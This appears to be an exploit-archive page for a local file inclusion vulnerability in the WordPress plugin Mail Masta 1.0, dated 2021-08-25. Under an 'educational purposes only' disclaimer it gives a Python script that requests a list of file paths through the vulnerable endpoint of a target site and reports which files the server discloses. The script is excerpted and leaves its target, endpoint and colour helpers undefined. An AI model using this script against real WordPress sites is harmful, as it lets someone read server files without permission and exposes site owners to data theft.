Wordpress plugin mail masta 1.0 local file inclusion (2) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-08-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin mail masta 1.0 local file inclusion (2) is for educational purposes only and if it is used you will do on your own risk!
WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github:
https://github.com/Xcatolin/Personal-Exploits/
#!/usr/bin/python
# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
import requests
from requests.exceptions import ConnectionError
print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
wordlist='wordlist.txt' ## Change here
lines=open(wordlist, "r").readlines()
for i in range(0, len(lines)):
word=lines[i].replace("\n","")
response = requests.get(target + endpoint + word)
if len(response.content) > 500 :
print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
Wordpress plugin mail masta 1.0 local file inclusion (2)